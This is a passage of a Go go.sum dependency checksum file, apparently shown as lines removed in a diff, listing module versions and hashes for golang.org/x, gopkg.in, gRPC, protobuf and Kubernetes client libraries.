v0.0.0-20200603152657-dc2b0ca8b37e h1:oIpIX9VKxSCFrfjsKpluGbNPBGq9iNnT9crH781j9wY= -github.com/yuin/gopher-lua v0.0.0-20200603152657-dc2b0ca8b37e/go.mod h1:gqRgreBUhTSL0GeU64rtZ3Uq3wtjOa/TB2YfrtkCbVQ= -go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= -go.opencensus.io v0.22.3/go.mod h1:yxeiOL68Rb0Xd1ddK5vPZ/oVn4vY4Ynel7k9FzqtOIw= -go.opentelemetry.io/otel v0.13.0 h1:2isEnyzjjJZq6r2EKMsFj4TxiQiexsM04AVhwbR/oBA= -go.opentelemetry.io/otel v0.13.0/go.mod h1:dlSNewoRYikTkotEnxdmuBHgzT+k/idJSfDv/FxEnOY= -go.uber.org/atomic v1.4.0 h1:cxzIVoETapQEqDhQu3QfnvXAV4AlzcvUCxkVUFw3+EU= -go.uber.org/atomic v1.4.0/go.mod h1:gD2HeocX3+yG+ygLZcrzQJaqmWj9AIm7n08wl/qW/PE= -golang.org/x/crypto v0.0.0-20180904163835-0709b304e793/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= -golang.org/x/crypto v0.0.0-20181029021203-45a5f77698d3/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= -golang.org/x/crypto v0.0.0-20190211182817-74369b46fc67/go.mod h1:6SG95UA2DQfeDnfUPMdvaQW0Q7yPrPDi9nlGo2tz2b4= -golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= -golang.org/x/crypto v0.0.0-20190611184440-5c40567a22f8/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= -golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= -golang.org/x/crypto v0.0.0-20200220183623-bac4c82f6975/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= -golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9 h1:psW17arqaxU48Z5kZ0CQnkZWQJsqcURM6tKiBApRjXI= -golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= -golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= -golang.org/x/exp v0.0.0-20190125153040-c74c464bbbf2/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= -golang.org/x/exp v0.0.0-20190312203227-4b39c73a6495/go.mod 
h1:ZjyILWgesfNpC6sMxTJOJm9Kp84zZh5NQWvqDGG3Qr8= -golang.org/x/image v0.0.0-20190227222117-0694c2d4d067/go.mod h1:kZ7UVZpmo3dzQBMxlp+ypCbDeSB+sBbTgSJuh5dn5js= -golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= -golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= -golang.org/x/lint v0.0.0-20190301231843-5614ed5bae6f/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= -golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= -golang.org/x/mobile v0.0.0-20190312151609-d3739f865fa6/go.mod h1:z+o9i4GpDbdi3rU15maQ/Ox0txvL9dWGYEHz965HBQE= -golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= -golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= -golang.org/x/net v0.0.0-20170114055629-f2499483f923/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20180906233101-161cd47e91fd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20181023162649-9b4f9f5ad519/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20181114220301-adae6a3d119a/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= -golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= -golang.org/x/net 
v0.0.0-20190613194153-d28f0bde5980/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20190827160401-ba9fcec4b297/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20191004110552-13f9640d40b9/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= -golang.org/x/net v0.0.0-20200520004742-59133d7f0dd7/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= -golang.org/x/net v0.0.0-20200528225125-3c3fba18258b/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= -golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81Ro3o1hOxt32SMVPicZroKQ2sZA= -golang.org/x/net v0.0.0-20201006153459-a7d1128ccaa0/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= -golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= -golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= -golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d h1:BgJvlyh+UqCUaPlscHJ+PN8GcpfrFdr7NHjd1JL0+Gs= -golang.org/x/net v0.0.0-20210415231046-e915ea6b2b7d/go.mod h1:9tjilg8BloeKEkVJvy7fQ90B1CfIiPueXVOjqfkSzI8= -golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= -golang.org/x/oauth2 v0.0.0-20190226205417-e64efc72b421/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= -golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45 h1:SVwTIAaPC2U/AvvLNZ2a7OVsmBpC8L5BlwK1whH3hm0= -golang.org/x/oauth2 v0.0.0-20190604053449-0f29369cfe45/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= -golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod 
h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20181221193216-37e7f081c4d4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20190227155943-e225da77a7e6/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20200625203802-6e8e738ad208/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sync v0.0.0-20210220032951-036812b2e83c h1:5KslGYwFpkhGh+Q16bwMP3cOontH8FOep7tGV86Y7SQ= -golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= -golang.org/x/sys v0.0.0-20170830134202-bb24a47a89ea/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20180905080454-ebe1bf3edb33/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20180909124046-d0be0721c37e/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20181026203630-95b1ffbd15a5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20181116152217-5ac8a444bdc5/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20190204203706-41f3e6584952/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20190209173611-3b5209105503/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= -golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 
-golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20190422165155-953cdadca894/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20190502145724-3ef323f4f1fd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20190616124812-15dcb6c0061f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20190826190057-c7b8b68b1456/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20190904154756-749cb33beabd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20191005200804-aed5e4c7ecf9/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20191022100944-742c48ecaeb7/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20191120155948-bd437916bb0e/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200519105757-fe76b779f299/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200523222454-059865788121/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210303074136-134d130e1a04/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210316164454-77fc1eacc6aa/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210330210617-4fbd30eecc44/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210415045647-66c3f260301c 
h1:6L+uOeS3OQt/f4eFHXZcTxeZrGCuz+CLElgEBjbcTA4= -golang.org/x/sys v0.0.0-20210415045647-66c3f260301c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= -golang.org/x/text v0.0.0-20160726164857-2910a502d2bf/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= -golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= -golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= -golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= -golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= -golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -golang.org/x/tools v0.0.0-20181011042414-1f849cf54d09/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -golang.org/x/tools v0.0.0-20190206041539-40960b6deb8e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= -golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= -golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= -golang.org/x/tools v0.0.0-20190312151545-0bb0c0a6e846/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 
-golang.org/x/tools v0.0.0-20190312170243-e65039ee4138/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= -golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= -golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= -golang.org/x/tools v0.0.0-20190614205625-5aca471b1d59/go.mod h1:/rFqwRUd4F7ZHNgwSSTFct+R/Kf4OFW1sUzUTQQTgfc= -golang.org/x/tools v0.0.0-20190920225731-5eefd052ad72/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= -golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= -golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= -golang.org/x/tools v0.0.0-20200908211811-12e1bf57a112/go.mod h1:Cj7w3i3Rnn0Xh82ur9kSqwfTHTeVxaDqrfMjpcNT6bE= -golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= -golang.org/x/tools v0.1.0 h1:po9/4sTYwZU9lPhi1tOrb4hCv3qrhiQ77LZfGa2OjwY= -golang.org/x/tools v0.1.0/go.mod h1:xkSsbof2nBLbhDlRMhhhyNLN/zl3eTqcnHD5viDpcZ0= -golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1 h1:go1bK/D/BFZV2I8cIQd1NKEZ+0owSTG1fDTci4IqFcE= -golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= -gonum.org/v1/gonum v0.0.0-20190331200053-3d26580ed485/go.mod h1:2ltnJ7xHfj0zHS40VVPYEAAMTa3ZGguvHGBSJeRWqE0= -gonum.org/v1/netlib v0.0.0-20190313105609-8cb42192e0e0/go.mod h1:wa6Ws7BG/ESfp6dHfk7C6KdzKA7wR7u/rKwOGE66zvw= -gonum.org/v1/netlib v0.0.0-20190331212654-76723241ea4e/go.mod 
h1:kS+toOQn6AQKjmKJ7gzohV1XkqsFehRA2FbsbkopSuQ= -google.golang.org/api v0.4.0/go.mod h1:8k5glujaEP+g9n7WNsDg8QP6cUVNI86fCNMcbazEtwE= -google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= -google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/appengine v1.5.0 h1:KxkO13IPW4Lslp2bz+KHP2E3gtFlrIGNThxkZQ3g+4c= -google.golang.org/appengine v1.5.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= -google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= -google.golang.org/genproto v0.0.0-20190307195333-5fe7a883aa19/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE= -google.golang.org/genproto v0.0.0-20190418145605-e7d98fc518a7/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE= -google.golang.org/genproto v0.0.0-20190425155659-357c62f0e4bb/go.mod h1:VzzqZJRnGkLBvHegQrXjBqPurQTc5/KpmUdxsrq26oE= -google.golang.org/genproto v0.0.0-20190530194941-fb225487d101 h1:wuGevabY6r+ivPNagjUXGGxF+GqgMd+dBhjsxW4q9u4= -google.golang.org/genproto v0.0.0-20190530194941-fb225487d101/go.mod h1:z3L6/3dTEVtUr6QSP8miRzeRqwQOioJ9I66odjN4I7s= -google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= -google.golang.org/grpc v1.20.1/go.mod h1:10oTOabMzJvdu6/UiuZezV6QK5dSlG84ov/aaiqXj38= -google.golang.org/grpc v1.21.0/go.mod h1:oYelfM1adQP15Ek0mdvEgi9Df8B9CZIaU1084ijfRaM= -google.golang.org/grpc v1.22.0 h1:J0UbZOIrCAl+fpTOf8YLs4dJo8L/owV4LYVtAXQoPkw= -google.golang.org/grpc v1.22.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= -google.golang.org/protobuf v0.0.0-20200109180630-ec00e32a8dfd/go.mod h1:DFci5gLYBciE7Vtevhsrf46CRTquxDuWsQurQQe4oz8= -google.golang.org/protobuf v0.0.0-20200221191635-4d8936d0db64/go.mod h1:kwYJMbMJ01Woi6D6+Kah6886xMZcty6N08ah7+eCXa0= -google.golang.org/protobuf v0.0.0-20200228230310-ab0ca4ff8a60/go.mod h1:cfTl7dwQJ+fmap5saPgwCLgHXTUD7jkjRqWcaiX5VyM= 
-google.golang.org/protobuf v1.20.1-0.20200309200217-e05f789c0967/go.mod h1:A+miEFZTKqfCUM6K7xSMQL9OKL/b6hQv+e19PK+JZNE= -google.golang.org/protobuf v1.21.0/go.mod h1:47Nbq4nVaFHyn7ilMalzfO3qCViNmqZ2kzikPIcrTAo= -google.golang.org/protobuf v1.23.0 h1:4MY060fB1DLGMB/7MBTLnwQUY6+F09GEiz6SsrNqyzM= -google.golang.org/protobuf v1.23.0/go.mod h1:EGpADcykh3NcUnDUJcl1+ZksZNG86OlYog2l/sGQquU= -gopkg.in/alecthomas/kingpin.v2 v2.2.6 h1:jMFz6MfLP0/4fUyZle81rXUoxOBFi19VUFKVDOQfozc= -gopkg.in/alecthomas/kingpin.v2 v2.2.6/go.mod h1:FMv+mEhP44yOT+4EoQTLFTRgOQ1FBLkstjWtayDeSgw= -gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= -gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127 h1:qIbj1fsPNlZgppZ+VLlY7N33q108Sa+fhmuc+sWQYwY= -gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= -gopkg.in/fsnotify.v1 v1.4.7/go.mod h1:Tz8NjZHkW78fSQdbUxIjBTcgA1z1m8ZHf0WmKUhAMys= -gopkg.in/inf.v0 v0.9.1 h1:73M5CoZyi3ZLMOyDlQh031Cx6N9NDJ2Vvfl76EDAgDc= -gopkg.in/inf.v0 v0.9.1/go.mod h1:cWUDdTG/fYaXco+Dcufb5Vnc6Gp2YChqWtbxRZE0mXw= -gopkg.in/ini.v1 v1.38.2/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= -gopkg.in/square/go-jose.v2 v2.3.1 h1:SK5KegNXmKmqE342YYN2qPHEnUYeoMiXXl1poUlI+o4= -gopkg.in/square/go-jose.v2 v2.3.1/go.mod h1:M9dMgbHiYLoDGQrXy7OpJDJWiKiU//h+vD76mk0e1AI= -gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7 h1:uRGJdciOHaEIrze2W8Q3AKkepLTh2hOroT7a+7czfdQ= -gopkg.in/tomb.v1 v1.0.0-20141024135613-dd632973f1e7/go.mod h1:dt/ZhP58zS4L8KSrWDmTeBkI65Dw0HsyUHuEVlX15mw= -gopkg.in/yaml.v2 v2.2.1/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= -gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= -gopkg.in/yaml.v2 v2.2.4/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= -gopkg.in/yaml.v2 v2.2.8/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= -gopkg.in/yaml.v2 v2.3.0/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= 
-gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= -gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= -gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo= -gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= -honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= -honnef.co/go/tools v0.0.0-20190106161140-3f1c8253044a/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= -honnef.co/go/tools v0.0.0-20190523083050-ea95bdfd59fc/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= -k8s.io/api v0.17.6/go.mod h1:1jKVwkj0UZ4huak/yRt3MFfU5wc32+B41SkNN5HhyFg= -k8s.io/api v0.18.6 h1:osqrAXbOQjkKIWDTjrqxWQ3w0GkKb1KA1XkUGHHYpeE= -k8s.io/api v0.18.6/go.mod h1:eeyxr+cwCjMdLAmr2W3RyDI0VvTawSg/3RFFBEnmZGI= -k8s.io/apimachinery v0.17.6/go.mod h1:Lg8zZ5iC/O8UjCqW6DNhcQG2m4TdjF9kwG3891OWbbA= -k8s.io/apimachinery v0.18.6 h1:RtFHnfGNfd1N0LeSrKCUznz5xtUP1elRGvHJbL3Ntag= -k8s.io/apimachinery v0.18.6/go.mod h1:OaXp26zu/5J7p0f92ASynJa1pZo06YlV9fG7BoWbCko= -k8s.io/client-go v0.17.6/go.mod h1:tX5eAbQR/Kbqv+5R93rzHQoyRnPjjW2mm9i0lXnW218= -k8s.io/code-generator v0.17.6/go.mod h1:iiHz51+oTx+Z9D0vB3CH3O4HDDPWrvZyUgUYaIE9h9M= -k8s.io/gengo v0.0.0-20190128074634-0689ccc1d7d6/go.mod h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0= -k8s.io/gengo v0.0.0-20190822140433-26a664648505/go.mod h1:ezvh/TsK7cY6rbqRK0oQQ8IAqLxYwwyPxAX1Pzy0ii0= -k8s.io/klog v0.0.0-20181102134211-b9b56d5dfc92/go.mod h1:Gq+BEi5rUBO/HRz0bTSXDUcqjScdoY3a9IHpCEIOOfk= -k8s.io/klog v0.3.0/go.mod h1:Gq+BEi5rUBO/HRz0bTSXDUcqjScdoY3a9IHpCEIOOfk= -k8s.io/klog v1.0.0 h1:Pt+yjF5aB1xDSVbau4VsWe+dQNzA0qv1LlXdC2dF6Q8= -k8s.io/klog v1.0.0/go.mod h1:4Bi6QPql/J/LkTDqv7R/cd3hPo4k2DG6Ptcz060Ez5I= 